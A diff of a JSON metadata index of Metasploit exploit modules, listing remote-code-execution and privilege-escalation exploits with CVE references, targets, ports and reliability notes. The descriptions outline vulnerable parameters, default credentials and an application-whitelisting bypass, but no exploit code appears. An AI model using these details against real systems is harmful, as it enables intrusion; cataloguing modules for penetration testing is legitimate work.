+    "type": "exploit",
+    "author": [
+      "Jann Horn",
+      "bcoles <bcoles@gmail.com>",
+      "timwr"
+    ],
+    "description": "This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux\n          kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but\n          not over an SSH session, as it requires execution from within the context of\n          a user with an active Polkit agent.\n          In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles\n          the recording of the credentials of a process that wants to create a ptrace\n          relationship, which allows local users to obtain root access by leveraging\n          certain scenarios with a parent-child process relationship, where a parent drops\n          privileges and calls execve (potentially allowing control by an attacker). One\n          contributing factor is an object lifetime issue (which can also cause a panic).\n          Another contributing factor is incorrect marking of a ptrace relationship as\n          privileged, which is exploitable through (for example) Polkit's pkexec helper\n          with PTRACE_TRACEME.",
+    "references": [
+      "CVE-2019-13272",
+      "EDB-47133",
+      "PACKETSTORM-153663",
+      "URL-https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1903"
+    ],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-11-03 00:33:24 +0000",
+    "path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/ptrace_traceme_pkexec_helper",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/local/rc_local_persistence": {
     "name": "rc.local Persistence",
     "fullname": "exploit/linux/local/rc_local_persistence",
@@ -60111,7 +61087,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-06-29 14:01:18 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/servu_ftp_server_prepareinstallation_priv_esc",
@@ -60119,6 +61095,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
     },
     "needs_cleanup": true
   },
@@ -60159,7 +61141,7 @@
     "targets": [
       "Linux x86"
     ],
-    "mod_time": "2018-11-11 09:37:56 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/sock_sendpage.rb",
     "is_install_path": true,
     "ref_name": "linux/local/sock_sendpage",
@@ -60167,6 +61149,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
     },
     "needs_cleanup": true
   },
@@ -60250,7 +61238,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-04-19 12:54:30 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
@@ -60258,6 +61246,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
     },
     "needs_cleanup": true
   },
@@ -60389,7 +61383,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/ufo_privilege_escalation.rb",
     "is_install_path": true,
     "ref_name": "linux/local/ufo_privilege_escalation",
@@ -60397,6 +61391,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
     },
     "needs_cleanup": true
   },
@@ -60436,7 +61436,7 @@
       "Linux x86",
       "Linux x64"
     ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/vmware_alsa_config.rb",
     "is_install_path": true,
     "ref_name": "linux/local/vmware_alsa_config",
@@ -60444,6 +61444,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
     },
     "needs_cleanup": true
   },
@@ -61790,7 +62796,7 @@
     "targets": [
       "UEB 9.*"
     ],
-    "mod_time": "2017-10-20 19:59:24 +0000",
+    "mod_time": "2019-10-05 14:40:27 +0000",
     "path": "/modules/exploits/linux/misc/ueb9_bpserverd.rb",
     "is_install_path": true,
     "ref_name": "linux/misc/ueb9_bpserverd",
@@ -62133,11 +63139,11 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-07-28 21:38:54 +0000",
+    "mod_time": "2019-12-09 20:09:52 +0000",
     "path": "/modules/exploits/linux/redis/redis_unauth_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/redis/redis_unauth_exec",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -62489,7 +63495,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
     "path": "/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/smtp/exim_gethostbyname_bof",
@@ -62497,6 +63503,9 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "ghost"
+      ]
     },
     "needs_cleanup": null
   },
@@ -62589,6 +63598,49 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/snmp/net_snmpd_rw_access": {
+    "name": "Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution",
+    "fullname": "exploit/linux/snmp/net_snmpd_rw_access",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2004-05-10",
+    "type": "exploit",
+    "author": [
+      "Steve Embling at InteliSecure"
+    ],
+    "description": "This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to\n            configure MIB extensions and lead to remote code execution.",
+    "references": [
+      "URL-http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt",
+      "URL-https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e",
+      "URL-https://digi.ninja/blog/snmp_to_shell.php",
+      "URL-https://sourceforge.net/p/net-snmp/mailman/message/15735617/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 161,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Linux x86",
+      "Linux x64"
+    ],
+    "mod_time": "2019-11-07 01:34:16 +0000",
+    "path": "/modules/exploits/linux/snmp/net_snmpd_rw_access.rb",
+    "is_install_path": true,
+    "ref_name": "linux/snmp/net_snmpd_rw_access",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/ssh/ceragon_fibeair_known_privkey": {
     "name": "Ceragon FibeAir IP-10 SSH Private Key Exposure",
     "fullname": "exploit/linux/ssh/ceragon_fibeair_known_privkey",
@@ -62913,7 +63965,7 @@
     "needs_cleanup": null
   },
   "exploit_linux/ssh/solarwinds_lem_exec": {
-    "name": "SolarWind LEM Default SSH Password Remote Code Execution",
+    "name": "SolarWinds LEM Default SSH Password Remote Code Execution",
     "fullname": "exploit/linux/ssh/solarwinds_lem_exec",
     "aliases": [
 
@@ -62924,7 +63976,7 @@
     "author": [
       "Mehmet Ince <mehmet@mehmetince.net>"
     ],
-    "description": "This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH\n        service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n        vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n        This module was tested against SolarWinds LEM v6.3.1.",
+    "description": "This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH\n        service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n        vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n        This module was tested against SolarWinds LEM v6.3.1.",
     "references": [
       "CVE-2017-7722",
       "URL-http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/"
@@ -62941,7 +63993,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2019-12-11 13:42:41 +0000",
     "path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -66567,7 +67619,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-02 20:23:12 +0000",
     "path": "/modules/exploits/multi/http/atutor_sqli.rb",
     "is_install_path": true,
     "ref_name": "multi/http/atutor_sqli",
@@ -67043,6 +68095,57 @@
     },
     "needs_cleanup": true
   },
+  "exploit_multi/http/cmsms_object_injection_rce": {
+    "name": "CMS Made Simple Authenticated RCE via object injection",
+    "fullname": "exploit/multi/http/cmsms_object_injection_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-03-26",
+    "type": "exploit",
+    "author": [
+      "Daniele Scanu danielescanu20 <Daniele Scanu danielescanu20@gmail.com>"
+    ],
+    "description": "An issue was discovered in CMS Made Simple 2.2.8.\n        In the module DesignManager (in the files action.admin_bulk_css.php\n        and action.admin_bulk_template.php), with an unprivileged user\n        with Designer permission, it is possible to reach an unserialize\n        call with a crafted value in the m1_allparms parameter,\n        and achieve object injection.\n\n        This module has been successfully tested on CMS Made Simple versions\n        2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.",
+    "references": [
+      "CVE-2019-9055",
+      "CWE-74",
+      "URL-https://newsletter.cmsmadesimple.org/w/89247Qog4jCRCuRinvhsofwg",
+      "URL-https://www.cmsmadesimple.org/2019/03/Announcing-CMS-Made-Simple-v2.2.10-Spuzzum"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-11-13 08:34:23 +0000",
+    "path": "/modules/exploits/multi/http/cmsms_object_injection_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/cmsms_object_injection_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
   "exploit_multi/http/cmsms_showtime2_rce": {
     "name": "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
     "fullname": "exploit/multi/http/cmsms_showtime2_rce",
@@ -67200,11 +68303,11 @@
     },
     "needs_cleanup": null
   },
-  "exploit_multi/http/coldfusion_rds": {
-    "name": "Adobe ColdFusion 9 Administrative Login Bypass",
-    "fullname": "exploit/multi/http/coldfusion_rds",
+  "exploit_multi/http/coldfusion_rds_auth_bypass": {
+    "name": "Adobe ColdFusion RDS Authentication Bypass",
+    "fullname": "exploit/multi/http/coldfusion_rds_auth_bypass",
     "aliases": [
-
+      "exploit/multi/http/coldfusion_rds"
     ],
     "rank": 500,
     "disclosure_date": "2013-08-08",
@@ -67241,10 +68344,10 @@
       "Windows",
       "Linux"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
-    "path": "/modules/exploits/multi/http/coldfusion_rds.rb",
+    "mod_time": "2019-10-31 09:59:35 +0000",
+    "path": "/modules/exploits/multi/http/coldfusion_rds_auth_bypass.rb",
     "is_install_path": true,
-    "ref_name": "multi/http/coldfusion_rds",
+    "ref_name": "multi/http/coldfusion_rds_auth_bypass",
     "check": true,
     "post_auth": false,
     "default_credential": false,
@@ -67506,7 +68609,7 @@
       "Drupal 7.0 - 7.31 (form-cache PHP injection method)",
       "Drupal 7.0 - 7.31 (user-post PHP injection method)"
     ],
-    "mod_time": "2018-01-03 23:10:16 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
     "path": "/modules/exploits/multi/http/drupal_drupageddon.rb",
     "is_install_path": true,
     "ref_name": "multi/http/drupal_drupageddon",
@@ -67514,6 +68617,9 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "Drupageddon"
+      ]
     },
     "needs_cleanup": null
   },
@@ -70444,7 +71550,7 @@
       "Unix CMD",
       "Linux Payload"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2019-10-05 14:22:18 +0000",
     "path": "/modules/exploits/multi/http/mutiny_subnetmask_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/mutiny_subnetmask_exec",
@@ -70665,6 +71771,67 @@
     },
     "needs_cleanup": true
   },
+  "exploit_multi/http/nostromo_code_exec": {
+    "name": "Nostromo Directory Traversal Remote Command Execution",
+    "fullname": "exploit/multi/http/nostromo_code_exec",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2019-10-20",
+    "type": "exploit",
+    "author": [
+      "Quentin Kaiser <kaiserquentin@gmail.com>",
+      "sp0re"
+    ],
+    "description": "This module exploits a remote command execution vulnerability in\n        Nostromo <= 1.9.6. This issue is caused by a directory traversal\n        in the function `http_verify` in nostromo nhttpd allowing an attacker\n        to achieve remote code execution via a crafted HTTP request.",
+    "references": [
+      "CVE-2019-16278",
+      "URL-https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, mipsbe, mipsle, armle, aarch64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2019-10-31 08:23:57 +0000",
+    "path": "/modules/exploits/multi/http/nostromo_code_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/nostromo_code_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/http/novell_servicedesk_rce": {
     "name": "Novell ServiceDesk Authenticated File Upload",
     "fullname": "exploit/multi/http/novell_servicedesk_rce",
@@ -71025,6 +72192,59 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/http/openmrs_deserialization": {
+    "name": "OpenMRS Java Deserialization RCE",
+    "fullname": "exploit/multi/http/openmrs_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-02-04",
+    "type": "exploit",
+    "author": [
+      "Nicolas Serra",
+      "mpgn",
+      "Shelby Pace"
+    ],
+    "description": "OpenMRS is an open-source platform that supplies\n        users with a customizable medical record system.\n\n        There exists an object deserialization vulnerability\n        in the `webservices.rest` module used in OpenMRS Platform.\n        Unauthenticated remote code execution can be achieved\n        by sending a malicious XML payload to a Rest API endpoint\n        such as `/ws/rest/v1/concept`.\n\n        This module uses an XML payload generated with Marshalsec\n        that targets the ImageIO component of the XStream library.\n\n        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java\n        8 and Java 9.",
+    "references": [
+      "CVE-2018-19276",
+      "URL-https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607",
+      "URL-https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization",
+      "URL-https://github.com/mpgn/CVE-2018-19276/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2019-12-04 12:17:35 +0000",
+    "path": "/modules/exploits/multi/http/openmrs_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/openmrs_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/http/openx_backdoor_php": {
     "name": "OpenX Backdoor PHP Code Execution",
     "fullname": "exploit/multi/http/openx_backdoor_php",
@@ -73649,7 +74869,7 @@
       "Splunk >= 5.0.1 / Linux",
       "Splunk >= 5.0.1 / Windows"
     ],
-    "mod_time": "2019-03-19 15:28:24 +0000",
+    "mod_time": "2019-11-26 15:38:34 +0000",
     "path": "/modules/exploits/multi/http/splunk_upload_app_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/splunk_upload_app_exec",
@@ -74950,6 +76170,67 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/http/totaljs_cms_widget_exec": {
+    "name": "Total.js CMS 12 Widget JavaScript Code Injection",
+    "fullname": "exploit/multi/http/totaljs_cms_widget_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-30",
+    "type": "exploit",
+    "author": [
+      "Riccardo Krauter",
+      "sinn3r <sinn3r@metasploit.com>"
+    ],
+    "description": "This module exploits a vulnerability in Total.js CMS. The issue is that a user with\n        admin permission can embed a malicious JavaScript payload in a widget, which is\n        evaluated server side, and gain remote code execution.",
+    "references": [
+      "CVE-2019-15954",
+      "URL-https://seclists.org/fulldisclosure/2019/Sep/5",
+      "URL-https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf"
+    ],
+    "platform": "",
+    "arch": "x86, x64",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Total.js CMS on Linux",
+      "Total.js CMS on Mac"
+    ],
+    "mod_time": "2019-10-15 14:00:58 +0000",
+    "path": "/modules/exploits/multi/http/totaljs_cms_widget_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/totaljs_cms_widget_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/http/traq_plugin_exec": {
     "name": "Traq admincp/common.php Remote Code Execution",
     "fullname": "exploit/multi/http/traq_plugin_exec",
@@ -75310,6 +76591,68 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/http/vbulletin_widgetconfig_rce": {
+    "name": "vBulletin widgetConfig RCE",
+    "fullname": "exploit/multi/http/vbulletin_widgetconfig_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-23",
+    "type": "exploit",
+    "author": [
+      "unknown",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]\n        parameter in an ajax/render/widget_php routestring POST request.",
+    "references": [
+      "CVE-2019-16759",
+      "URL-https://seclists.org/fulldisclosure/2019/Sep/31",
+      "URL-https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html"
+    ],
+    "platform": "PHP,Unix,Windows",
+    "arch": "cmd, php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Meterpreter (PHP In-Memory)",
+      "Unix (CMD In-Memory)",
+      "Windows (CMD In-Memory)"
+    ],
+    "mod_time": "2019-12-10 12:10:04 +0000",
+    "path": "/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/vbulletin_widgetconfig_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/http/visual_mining_netcharts_upload": {
     "name": "Visual Mining NetCharts Server Remote Code Execution",
     "fullname": "exploit/multi/http/visual_mining_netcharts_upload",
@@ -76410,7 +77753,7 @@
       "Solaris",
       "Linux"
     ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
@@ -76418,6 +77761,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
     },
     "needs_cleanup": true
   },
@@ -76471,6 +77820,54 @@
     },
     "needs_cleanup": true
   },
+  "exploit_multi/local/xorg_x11_suid_server_modulepath": {
+    "name": "Xorg X11 Server SUID modulepath Privilege Escalation",
+    "fullname": "exploit/multi/local/xorg_x11_suid_server_modulepath",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2018-10-25",
+    "type": "exploit",
+    "author": [
+      "Narendra Shinde",
+      "Aaron Ringo"
+    ],
+    "description": "This module attempts to gain root privileges with SUID Xorg X11 server\n        versions 1.19.0 < 1.20.3.\n\n        A permission check flaw exists for -modulepath and -logfile options when\n        starting Xorg.  This allows unprivileged users that can start the server\n        the ability to elevate privileges and run arbitrary code under root\n        privileges.\n\n        This module has been tested with CentOS 7 (1708).\n        CentOS default install will require console auth for the users session.\n        Xorg must have SUID permissions and may not start if running.\n\n        On successful exploitation artifacts will be created consistant\n        with starting Xorg.",
+    "references": [
+      "CVE-2018-14665",
+      "BID-105741",
+      "EDB-45697",
+      "EDB-45742",
+      "EDB-45832",
+      "URL-https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html"
+    ],
+    "platform": "Linux,Solaris,Unix",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Linux x64",
+      "Linux x86",
+      "Solaris x86",
+      "Solaris x64"
+    ],
+    "mod_time": "2019-10-22 09:31:43 +0000",
+    "path": "/modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb",
+    "is_install_path": true,
+    "ref_name": "multi/local/xorg_x11_suid_server_modulepath",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
   "exploit_multi/misc/arkeia_agent_exec": {
     "name": "Western Digital Arkeia Remote Code Execution",
     "fullname": "exploit/multi/misc/arkeia_agent_exec",
@@ -76824,7 +78221,7 @@
       "Windows",
       "Windows (CmdStager)"
     ],
-    "mod_time": "2018-12-21 07:33:37 +0000",
+    "mod_time": "2019-10-05 14:40:27 +0000",
     "path": "/modules/exploits/multi/misc/erlang_cookie_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/misc/erlang_cookie_rce",
@@ -76835,6 +78232,50 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/misc/freeswitch_event_socket_cmd_exec": {
+    "name": "FreeSWITCH Event Socket Command Execution",
+    "fullname": "exploit/multi/misc/freeswitch_event_socket_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-03",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses the FreeSWITCH event socket interface\n        to execute system commands using the `system` API command.\n\n        The event socket service is enabled by default and listens\n        on TCP port 8021 on the local network interface.\n\n        This module has been tested successfully on FreeSWITCH versions:\n\n        1.6.10-17-726448d~44bit on FreeSWITCH-Deb8-TechPreview virtual machine;\n        1.8.4~64bit on Ubuntu 19.04 (x64); and\n        1.10.1~64bit on Windows 7 SP1 (EN) (x64).",
+    "references": [
+      "CWE-260",
+      "URL-https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket"
+    ],
+    "platform": "BSD,Linux,Unix,Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 8021,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux (Dropper)",
+      "PowerShell (In-Memory)",
+      "Windows (In-Memory)",
+      "Windows (Dropper)"
+    ],
+    "mod_time": "2019-11-02 22:03:02 +0000",
+    "path": "/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/freeswitch_event_socket_cmd_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
   "exploit_multi/misc/hp_data_protector_exec_integutil": {
     "name": "HP Data Protector EXEC_INTEGUTIL Remote Code Execution",
     "fullname": "exploit/multi/misc/hp_data_protector_exec_integutil",
@@ -78862,7 +80303,8 @@
       "Casey Smith",
       "Trenton Ivey",
       "g0tmi1k",
-      "bcoles <bcoles@gmail.com>"
+      "bcoles <bcoles@gmail.com>",
+      "phra"
     ],
     "description": "This module quickly fires up a web server that serves a payload.\n        The provided command which will allow for a payload to download and execute.\n        It will do it either specified scripting language interpreter or \"squiblydoo\" via regsvr32.exe\n        for bypassing application whitelisting. The main purpose of this module is to quickly establish\n        a session on a target machine when the attacker has to manually type in the command:\n        e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.\n        This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege\n        escalations supplied by Meterpreter.\n\n        When using either of the PSH targets, ensure the payload architecture matches the target computer\n        or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.\n\n        Regsvr32 uses \"squiblydoo\" technique for bypassing application whitelisting.\n        The signed Microsoft binary file, Regsvr32, is able to request an .sct file\n        and then execute the included PowerShell command inside of it.\n\n        Similarly, the pubprn target uses the pubprn.vbs script to request and\n        execute a .sct file.\n\n        Both web requests (i.e., the .sct file and PowerShell download/execute)\n        can occur on the same port.\n\n        \"PSH (Binary)\" will write a file to the disk, allowing for custom binaries\n        to be served up to be downloaded and executed.",
     "references": [
@@ -78871,7 +80313,8 @@
       "URL-http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/",
       "URL-https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html",
       "URL-https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html",
-      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"
+      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/",
+      "URL-https://iwantmore.pizza/posts/amsi.html"
     ],
     "platform": "Linux,PHP,Python,Windows",
     "arch": "",
@@ -78891,7 +80334,7 @@
       "PSH (Binary)",
       "Linux"
     ],
-    "mod_time": "2019-07-12 23:16:43 +0000",
+    "mod_time": "2019-12-09 11:21:52 +0000",
     "path": "/modules/exploits/multi/script/web_delivery.rb",
     "is_install_path": true,
     "ref_name": "multi/script/web_delivery",
@@ -81044,6 +82487,54 @@
     },
     "needs_cleanup": true
   },
+  "exploit_solaris/local/xscreensaver_log_priv_esc": {
+    "name": "Solaris xscreensaver log Privilege Escalation",
+    "fullname": "exploit/solaris/local/xscreensaver_log_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-10-16",
+    "type": "exploit",
+    "author": [
+      "Marco Ivaldi",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a vulnerability in `xscreensaver` versions\n        since 5.06 on unpatched Solaris 11 systems which allows users\n        to gain root privileges.\n\n        `xscreensaver` allows users to create a user-owned file at any\n        location on the filesystem using the `-log` command line argument\n        introduced in version 5.06.\n\n        This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,\n        overwrites the log file with a shared object, and executes the shared\n        object using the `LD_PRELOAD` environment variable.\n\n        This module has been tested successfully on:\n\n        xscreensaver version 5.15 on Solaris 11.1 (x86); and\n        xscreensaver version 5.15 on Solaris 11.3 (x86).",
+    "references": [
+      "CVE-2019-3010",
+      "EDB-47509",
+      "URL-https://seclists.org/fulldisclosure/2019/Oct/39",
+      "URL-https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver",
+      "URL-https://techblog.mediaservice.net/2019/10/local-privilege-escalation-on-solaris-11-x-via-xscreensaver/",
+      "URL-https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
+    ],
+    "platform": "Solaris,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-10-23 06:37:30 +0000",
+    "path": "/modules/exploits/solaris/local/xscreensaver_log_priv_esc.rb",
+    "is_install_path": true,
